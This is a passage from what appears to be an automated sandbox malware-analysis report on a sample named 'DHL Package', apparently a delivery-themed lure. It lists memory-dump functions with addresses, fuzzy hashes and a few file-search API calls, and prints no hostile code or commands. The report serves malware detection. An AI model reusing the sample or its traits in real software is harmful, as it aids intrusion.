Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
Opcode Fuzzy Hash: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE

Function 00406AFA Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45

Function 00406739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(77163420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,00437800,00405B0D,?,77163420,00437800), ref: 00406744
FindClose.KERNEL32(00000000), ref: 00406750

Strings

XgB, xrefs: 0040673A

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC

Function 0015E340 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5+r, xrefs: 0015E45B

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: .5+r
API String ID: 0-2339556627
Opcode ID: b8024cb82bf5b07bf3a8ab72d931a6f9e56c82b399e572fc9585fe55fc73a736
Instruction ID: 4a953d2bdb9b4a5318586912212d53a27b143bf5367a5ac52289012011ffad22
Opcode Fuzzy Hash: b8024cb82bf5b07bf3a8ab72d931a6f9e56c82b399e572fc9585fe55fc73a736
Instruction Fuzzy Hash: EA526C74E01228CFDB68DF65C884B9DBBB2BB89305F1081E9D809AB355DB359E85CF50

Function 0015FB39 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6b9128f4bb50139009c89b79e982bd683366f4edcc852917518ea8d79697b0
Instruction ID: cc91319c3fd4ea97d29e899ed4bcbe9dc1643591e5adc252db76b2c0965bf286
Opcode Fuzzy Hash: dd6b9128f4bb50139009c89b79e982bd683366f4edcc852917518ea8d79697b0
Instruction Fuzzy Hash: A7D1C174E01218CFDB54DFA5C984B9DBBB2BF89301F2081AAD819AB365DB345E85CF50

Function 393A8A20 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0341d1a4b5b991ffae4e77e2e20fdd5646502488fd616f83262ac803cc60974f
Instruction ID: 20233704eefe3f76296d0b4821b71c41b751b58abfb4b8897ee135f857aa9b95
Opcode Fuzzy Hash: 0341d1a4b5b991ffae4e77e2e20fdd5646502488fd616f83262ac803cc60974f
Instruction Fuzzy Hash: FFC1B0B4E01218CFEB54DFA5C994B9DBBB2FF89300F2091A9D408AB355DB385A85CF50

Function 393A7D18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779eebf1eb2811ecff4de7f8e5689ff1dacaff5c39e1c9631f91f92742823638
Instruction ID: d0bb08a52eb691b0d1f7ec9316c701ad1e4f68bbbfcedfbda53a3e0f2b203dd9
Opcode Fuzzy Hash: 779eebf1eb2811ecff4de7f8e5689ff1dacaff5c39e1c9631f91f92742823638
Instruction Fuzzy Hash: 04C1B1B4E01218CFEB54DFA5C994B9DBBB2BF89300F1090AAD809AB355DB345E85CF50

Function 393A3008 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b91b96a0762a4deb78805b4a7b592e2201cc2c1660798de14917870e49d8597
Instruction ID: 65880141ff4a028c232c887507b6ec92874c1f2fa283c80ffb28b25f234d95b2
Opcode Fuzzy Hash: 1b91b96a0762a4deb78805b4a7b592e2201cc2c1660798de14917870e49d8597
Instruction Fuzzy Hash: 55C1C374E01218CFEB54DFA5C994B9DBBB2BF89300F1090AAD808AB355DB355E85CF51

Function 393A2300 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b55e90b052aae1f7f7a4e47c34960b1ac164b43fef4cf73416736c8f8aa2bec
Instruction ID: accd91261bcb3e0468cc0eab0cd352ce835a7adedcca085c9401473bfbce0f29
Opcode Fuzzy Hash: 5b55e90b052aae1f7f7a4e47c34960b1ac164b43fef4cf73416736c8f8aa2bec
Instruction Fuzzy Hash: C2C1C374E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB355E85CF50

Function 393AA000 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a687a96a69a6f74382bdcc9068f49783919b9a98d52b71145e24b2b9ab015c
Instruction ID: 9b53361c8053f0b4e941374c4932427c8c0f25928242f8c5a53c5e96ba20d0a8
Opcode Fuzzy Hash: a1a687a96a69a6f74382bdcc9068f49783919b9a98d52b71145e24b2b9ab015c
Instruction Fuzzy Hash: 31C1C2B4E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB355E85CF50

Function 393A8E78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fc2d9ca1e0513e8e61d767f0043a96fb027824efb5252c70e4201a583ed584
Instruction ID: 292001c8468cfc3a01207d2513ae0775092e596c96229328a9671de1bdb3d62d
Opcode Fuzzy Hash: f5fc2d9ca1e0513e8e61d767f0043a96fb027824efb5252c70e4201a583ed584
Instruction Fuzzy Hash: 94C1B174E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D408AB355DB389E85CF50

Function 393A8170 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16bceaed270e61aa6fa332717c36cb5a1201f1db4cd8e28578fa6c362a7de3d
Instruction ID: 41a291cc3cf39ee13e062373b89994df77fdb2515a2a58a0f83bb9b8c2326631
Opcode Fuzzy Hash: b16bceaed270e61aa6fa332717c36cb5a1201f1db4cd8e28578fa6c362a7de3d
Instruction Fuzzy Hash: AEC1B1B4E01218CFEB54DFA5C994B9DBBB2FF89300F1090A9D808AB355DB345A85CF50

Function 393A3460 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa24f8db0ad615d76740a1e1878952b7baebbcfb8301dd2be9c0d2666fae7c41
Instruction ID: 93c8c52a7907a13e602157c2254883905f020dda0bd55300cec0933c799861e1
Opcode Fuzzy Hash: aa24f8db0ad615d76740a1e1878952b7baebbcfb8301dd2be9c0d2666fae7c41
Instruction Fuzzy Hash: 2AC1C3B4E01218CFEB54DFA5C994B9DBBB2BF89300F1090A9D808AB355DB355E85CF51

Function 393A2758 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d864e49631715223d47f1335677002d421dca57e16c3d9d7c580c5f3be1e8920
Instruction ID: 57f1d9da3cb64c8489faabd80ad1fc04e6f72dc791cb6f6614261979297456c1
Opcode Fuzzy Hash: d864e49631715223d47f1335677002d421dca57e16c3d9d7c580c5f3be1e8920
Instruction Fuzzy Hash: A4C1C274E01218CFEB54DFA5C990B9DBBB2BF89300F2091A9D808AB355DB345E85CF50

Function 393AA458 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b917ea41489153f861625b5406ed07fec8f65164cc07a8c8d25d3401ab4477f
Instruction ID: 4ea28285a5925cffb3e2f2c3b7b9204874c2e0060106122d72b7ac3880f02523
Opcode Fuzzy Hash: 5b917ea41489153f861625b5406ed07fec8f65164cc07a8c8d25d3401ab4477f
Instruction Fuzzy Hash: B6C1B2B4E01218CFEB54DFA5C994B9DBBB2BF89300F1091AAD408AB355DB395E85CF50

Function 393A1A50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b415ad3b3f2ecf957f27393e25512e54d309db852a48536f940ee90281d2100
Instruction ID: 44999a6a506043515e6f010c0af169a8e1f442387376e725480bba1b9d6c1f65
Opcode Fuzzy Hash: 6b415ad3b3f2ecf957f27393e25512e54d309db852a48536f940ee90281d2100
Instruction Fuzzy Hash: 05C1C274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB395E85CF50

Function 393A9750 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96fc78f8d26bb10ba0a87f593288834b131f6aba7e4cd182453105141b341cc5
Instruction ID: 8dd963c99196bb74e7107074c4a6e117db6b4a2c2e9c643ac2dd977fcbc2a3fe
Opcode Fuzzy Hash: 96fc78f8d26bb10ba0a87f593288834b131f6aba7e4cd182453105141b341cc5
Instruction Fuzzy Hash: ACC1B0B4E01218CFEB54DFA5C894B9DBBB2BF89304F2091A9D409AB355DB349E85CF50

Function 393A0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c652814c2e2f194f5c4d284dd1d50fab39dbdb4f214fb5bc2a01e1d7d32b046d
Instruction ID: 19485c06c541d65acafcf3c2ce1d939801d52832d1d480cbd59cfc86545d06b6
Opcode Fuzzy Hash: c652814c2e2f194f5c4d284dd1d50fab39dbdb4f214fb5bc2a01e1d7d32b046d
Instruction Fuzzy Hash: 72C1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D808AB355DB385E85CF54

Function 393A0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced47f99514898f4114c219ac6ab8c33328af0bb669c7c1969f9a7d51d9c63ee
Instruction ID: 77baa9019cf40f81d8a4959dbe24d1977db5d7f1f0f7bca14c59d23f9617bbdf
Opcode Fuzzy Hash: ced47f99514898f4114c219ac6ab8c33328af0bb669c7c1969f9a7d51d9c63ee
Instruction Fuzzy Hash: BFC1C274E01218CFEB54DFA5C990B9DBBB2BF89300F2091AAD408AB355DB395E85CF50

Function 393AA8B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c16068f7a322c74d9d79f765c12185113a46c9af1bd58243df35f817e1b55bb
Instruction ID: 452d08edb7416276b25257c107044ae588389f8a88e29c9d2e8a647bf8de932c
Opcode Fuzzy Hash: 6c16068f7a322c74d9d79f765c12185113a46c9af1bd58243df35f817e1b55bb
Instruction Fuzzy Hash: B6C1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB395E85CF50

Function 393A2BB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff4ee0c03280fdbfeaeeb5af3840a5cc3e8164aff9077d32ace65e74bc576ba
Instruction ID: d78b78e972abb3df45c88cfb57597269bb18cbffcfd24ded30f7bb50a73663ba
Opcode Fuzzy Hash: 5ff4ee0c03280fdbfeaeeb5af3840a5cc3e8164aff9077d32ace65e74bc576ba
Instruction Fuzzy Hash: B7C1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D808AB355DB355E85CF50

Function 393A1EA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1398c08737106322c81ef515770541dcffb3b17fdaaf50ce7bd67c371b182828
Instruction ID: 7b5935d9c0c04a157df3181fbd839a404f9359f2c1891942a88bb3a2b0bb1695
Opcode Fuzzy Hash: 1398c08737106322c81ef515770541dcffb3b17fdaaf50ce7bd67c371b182828
Instruction Fuzzy Hash: C6C1C274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD808AB355DB345E85CF50

Function 393A9BA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c5d42396dd3f871d3372a7ddb20bd4b2e52d27d1f47a4a39f0f6ac303ba0e6
Instruction ID: c61b6548c554dc5aafc6984bea961bafde7095e38acd788b9f7db3adf13f0e5b
Opcode Fuzzy Hash: 38c5d42396dd3f871d3372a7ddb20bd4b2e52d27d1f47a4a39f0f6ac303ba0e6
Instruction Fuzzy Hash: 59C1B174E01218CFEB54DFA5C994B9DBBB2BF89304F2090A9D408AB355DB349E85CF50

Function 393A11A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b7a8a77a0b0073ec6c5c9ac7d77d2bb495662387c5a11d2ad5884d82ee2d1
Instruction ID: e15d067acbc506b77d98d2f12902feb2c32ebbf46f41efa5feb760cce4215a16
Opcode Fuzzy Hash: 241b7a8a77a0b0073ec6c5c9ac7d77d2bb495662387c5a11d2ad5884d82ee2d1
Instruction Fuzzy Hash: 97C1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD409AB355DB349E85CF50

Function 393A0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826a3fb79bb6f418311789265e2e6e3b5e4f8363951fd5de7ea85bf142e5745c
Instruction ID: ddd644835fa4eb18fe2c089b462d8a659b02287c344e9c62f1350831a3dc6600
Opcode Fuzzy Hash: 826a3fb79bb6f418311789265e2e6e3b5e4f8363951fd5de7ea85bf142e5745c
Instruction Fuzzy Hash: A0C1C274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB385E85CF50

Function 393A7898 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd5040597161b3a162c44c128f04df0ca2ef606ec9184e8fdc88f45d401ee5e
Instruction ID: fcd128fef9954ae697ae0d4e10caf49648921f7ad98af1942037c93b34fd0edc
Opcode Fuzzy Hash: 5fd5040597161b3a162c44c128f04df0ca2ef606ec9184e8fdc88f45d401ee5e
Instruction Fuzzy Hash: 53C1C3B4E01218CFEB54DFA5C994B9DBBB2BF89300F1091AAD409AB355DB385E85CF50

Function 393A15F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888decf6b5a82e8b9a6edcaa4d83a3c7ef8b353e6a42b10b338ff4bb73e73bdf
Instruction ID: 0564ac2f972bde448850c9d772d9e4c5e8c3bc0376769f09cac3bd3f8107fa73
Opcode Fuzzy Hash: 888decf6b5a82e8b9a6edcaa4d83a3c7ef8b353e6a42b10b338ff4bb73e73bdf
Instruction Fuzzy Hash: 8AC1D274E01218CFEB54DFA5C990B9DBBB2BF89300F2091AAD808AB355DB355E85CF50

Function 393A08F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879c242123aeef9d4a00619404387608c03cb55b75cc2309ef8a6696acadabfd
Instruction ID: c13df14696857b77b843997aa5ed5cc0d1a48b115f748f171e38ea8d7d776472
Opcode Fuzzy Hash: 879c242123aeef9d4a00619404387608c03cb55b75cc2309ef8a6696acadabfd
Instruction Fuzzy Hash: C0C1C374E01218CFEB54DFA5C994B9DBBB2BF89304F2091A9D808AB355DB385E85CF50

Function 393A92D0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c15677a9777fb2f072250a336aba04bce5e4e335434e2d7131b5e46cb4234f
Instruction ID: eecf963c0ee7f3d30725cb9dd632a665def2999b15d01b976a560c49dbb41936
Opcode Fuzzy Hash: 93c15677a9777fb2f072250a336aba04bce5e4e335434e2d7131b5e46cb4234f
Instruction Fuzzy Hash: FDC1A174E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D408AB395DB359E85CF50

Function 393A85C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468b272d08b98f4cf66c81498d1689fa7365207bc99e72ed692d85217505835b
Instruction ID: 7a647bda6f8faa7d38b255db895c2492f52bb6351865c40ee5c1f4b089a7aa79
Opcode Fuzzy Hash: 468b272d08b98f4cf66c81498d1689fa7365207bc99e72ed692d85217505835b
Instruction Fuzzy Hash: A8C1B0B4E01218CFEB54DFA5C994B9DBBB2BF89304F1091AAD808AB355DB345E85CF50

Function 39380900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5f65b7f6dc88eaf33450ed0780707d6136ade4b98a9e06a03c96bc9f508740
Instruction ID: 2fae4f790ca99156735ea9634caf3f1d8515d2d5ffaae00e1ae6fd1d7801ccc5
Opcode Fuzzy Hash: bf5f65b7f6dc88eaf33450ed0780707d6136ade4b98a9e06a03c96bc9f508740
Instruction Fuzzy Hash: 6BC1B2B4E01218CFEB54DFA5C994B9DBBB2FF89301F1081AAD809A7355DB345A85CF50

Function 3938E148 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6cda23b8e31749a03bbcb944fbfee065ba3b209363a529813ca45f349a8788a
Instruction ID: 1495b7bf77c26f158f6b0ed748b43d381c6e24a2412fae367b47ceb17081813f
Opcode Fuzzy Hash: d6cda23b8e31749a03bbcb944fbfee065ba3b209363a529813ca45f349a8788a
Instruction Fuzzy Hash: 6BC1C374E05218CFEB54DFA5C990B9DBBB2BF89300F2091AAD408AB355DB349E85CF51

Function 3938E5A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c5396e6feb783484a88af0a1a12a5f9609a50829d418ec0f7576036cb633a0
Instruction ID: 0cda8ff39cffd6fba83713590a79872688c0d92e1bc06e5ae0c7d51806eda7b7
Opcode Fuzzy Hash: a0c5396e6feb783484a88af0a1a12a5f9609a50829d418ec0f7576036cb633a0
Instruction Fuzzy Hash: 3AC1C3B4E01218CFEB54DFA5C994B9DBBB2BF89300F2090A9D408AB355DB385E85CF51

Function 3938E9F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3f13511ac7ffc5c5c499eb4cd7c7869ed29caa9faa1ccb71ccb88561356a3b
Instruction ID: 26170db4bed621da9ade26d9256eb4ab8a41d49d3eed5ba1241429f9bcd23fcc
Opcode Fuzzy Hash: 2e3f13511ac7ffc5c5c499eb4cd7c7869ed29caa9faa1ccb71ccb88561356a3b
Instruction Fuzzy Hash: CCC1D374E01218CFEB54DFA5C894B9DBBB2BF89300F2090A9D409AB355DB345E85CF51

Function 39380040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b70b2d0081251364643c2ba982efc8defbdb7d7cd258483063d5d9377c230f6b
Instruction ID: df5c2c11377ada79ee1a50cb27576eaf7e2135f4c729c74a8665f45df4d6c1d3
Opcode Fuzzy Hash: b70b2d0081251364643c2ba982efc8defbdb7d7cd258483063d5d9377c230f6b
Instruction Fuzzy Hash: 25C1A2B4E01218CFEB54DFA5C994B9DBBB2FF89301F1081AAD809AB355DB345A85CF50

Function 393804A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

